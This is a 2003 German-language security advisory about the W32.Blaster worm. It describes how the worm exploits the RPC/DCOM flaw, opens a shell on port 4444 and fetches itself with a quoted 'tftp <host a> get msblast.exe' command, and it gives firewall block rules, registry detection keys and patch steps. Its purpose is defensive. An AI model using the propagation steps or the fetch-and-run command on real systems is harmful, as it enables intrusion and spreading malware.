Security Information W32.BLASTER

Betreff: Wurmverbreitung W32.BLASTER.A
Datum: 12.08./13.08.03 Update 14.08.03
Coburg
Brain-Pro Security

Alias: W32.Blaster.Worm, W32/Lovsan.worm, W32/Blaster-A, Worm.Win32.Lovesan, WORM_MSBLAST.A, WORM_MSBLAST.B, WORM_MSBLAST.C

Ein neuer Wurm hat von sich reden gemacht, der W32-Blaster oder auch WORM_MSBLAST.A geht um.
Dieser Wurm hat einmal mehr gezeigt, dass es absolut notwendig ist unter Windwos Betriebssystemen ein regelmässiges Patchwork zu betreiben.
Bei diesem Wurm ist die Schwachstelle im RPC/DCOM Dienst ausgenutzt worden, die seit einem Monat bekannt war und die Verbreitung beschleunigt hat.
Am 16.07.03 gibt Microsoft in einem Security Bulletin die Schwachstelle bekannt:
http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS03-026.asp.
Ebenfalls stellt Microsft hierfür ausreichend Patches zur Verfügung, um betroffene Systeme gegen diese Schwachstelle zu sichern.
Die Ausbreitung ist recht geschickt in diesem Wurm gelöst worden.
So startet der Wurm auf einem befallenenen System "A" einen TFTP-Server und greift weitere Windows-Systeme "B" auf Port 135 an.
Ist ein Angriff erfolgreich, so wird der hierbei eingeschleuste Code ausgeführt, der auf dem System "B" eine Shell auf Port 4444 öffnet.
Das System "A" veranlasst nun das System "B" mittels des gestarteten TFTP (tftp <host a> get msblast.exe) die Datei msblast.exe in das Verzeichnis %WinDir%\System32 nachzuladen und anschliessend gleich zu starten.
Der Wurm installiert sich nun auf dem System "B", schließt den geöffneten Port 4444, startet ein weiteres mal einen TFTP-Server und greift mit der gleichen Methode weitere Systeme an.
Nach Angaben von TrendMicro Deutschland führt der Wurm dann an den folgenden Monaten einen DDoS Attacke auf windowsupdate.com aus:
Am 16. bis 31. der folgenden Monate: Januar, Februar, März, April, Mai, Juni, Juli und August.
Auffällig wird die Aktivität des Wurms durch erhöhten Traffic auf UDP Port 69, der dem TFTP Daemon zugeordnet ist.

Firewalls können mittels einer Regel entsprechend schnell darauf reagieren:
BLOCKIEREN/BLOCK: UDP- und TCP-Ports 137 bis 139, 445 und 593.

IP Tables:
iptables -A INPUT -p tcp --dport 135 -i $INET_IFACE -j DROP
iptables -A INPUT -p tcp --dport 139 -i $INET_IFACE -j DROP
iptables -A INPUT -p tcp --dport 445 -i $INET_IFACE -j DROP

Outpost User:
bootps 67/tcp Bootstrap Protocol Server
bootps 67/udp Bootstrap Protocol Server
bootpc 68/tcp Bootstrap Protocol Client
bootpc 68/udp Bootstrap Protocol Client

dhcpv6-client 546/tcp DHCPv6 Client
dhcpv6-client 546/udp DHCPv6 Client
dhcpv6-server 547/tcp DHCPv6 Server
dhcpv6-server 547/udp DHCPv6 Server

[DHCP Client Rule]
Where the protocol is: UDP
Where the local port is: 68, 546
Where the remote port is: 67, 547
Allow It

[DHCP Server Rule]
Where the protocol is: UDP
Where the local port is: 67, 547
Where the remote port is: 68, 546
Allow I

Protocol: UDP
Remote Ports: 67, 68, 546, 547

Protocol: UDP
LocalPort: 68
RemotePort: 67
Direction: Inbound
AllowIt

"Allein in Coburg und Umgebung sind Meldungen bei Brain-Pro Security eingetroffen, nach denen mehr als 120 Systeme betroffen waren.
Die betroffenen Systeme haben sich nach den Angaben der Betroffenen seltsam verhalten, haben sich selbständig neu gestartet und haben einen Abbruch nicht mehr zugelassen."
Der Wurm lässt sich manuell aufspühren, in dem die Daten der Prozesse verglichen werden über den Taskmanager und den Registry-Einträgen in der Datenbank.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run "windows auto update" = msblast.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! bill.
Kaum hat die Arbeit begonne, Computer und Netzwerke zu fixen meldet TrendMicro einen zweiten Ableger des MSBLASTER WURMs:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_RPCSDBOT.A
Weiterhin wird dringend darauf hingewiesen , dass im Internet derzeit EXPLOITS kursieren die ebenfalls diese Schwachstelle der infizierten Systeme ausnutzen und eine weitere Verbreitung hierdurch ermöglichen.
Bisher (13.08.) sind geschätzte Zahlen von bis zu 1,4 Millionen infizierte Systeme aufgetaucht.
(Quelle CERT)
Abhilfe direkt:
Step by Step:
- Laden Sie sich das HOTFIX von Microsoft herunter
- Laden Sie sich das Fix Util von Symantec herunter
- Offline gehen und das HOTFIX von Microsoft installieren
- Fix Util von Symantec den Rechner scanen lassen
- Neustart des Rechners

Die bisher weiteren aufgetauchten Versionen verwenden die Dateinamen:
- teekids.exe
- root32.exe
- index.exe
- Penis32.exe

Update: 14.08.03
Patchwork :: Patchfixes auf dem Computecmirror
http://www.computec.ch/projekte/patchmirror/

Respektvolle & Beste Grüße
Marko Rogge :: IT-Security Consultant
Brain-Pro Security Coburg
E-Mail: mr@brain-pro dot de
http://www.brain-pro.de
Tel.: +49 (0) 162-1964818

Relevante Hinweise und Links:
Security Bulletin Microsoft & Patches für alle betroffenen Systeme:
http://www.microsoft.com/security/security_bulletins/ms03-026.asp
Was ist RPC/DCOM:
http://www.microsoft.com/com/tech/dcom.asp
TrendMicro, Info zum Wurmnachfolger RPCSDBOT.A:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_RPCSDBOT.A
Meldung dazu von Symantec:
http://securityresponse.symantec.com/avcenter/venc/data/w32.randex.e.html
CERT Meldung über den Befall anderer Systeme:
http://www.kb.cert.org/vuls/id/377804
eEye Security Special Paper:
http://www.eeye.com/html/Research/Advisories/AL20030811.html
Meldungen der Wurmvarianten & Remove Instructions:
W32.Blaster.B Symantec Research
W32.Blaster.C Symantec Research
Diese Pressemeldung:
http://www.brain-pro.de/blaster.htm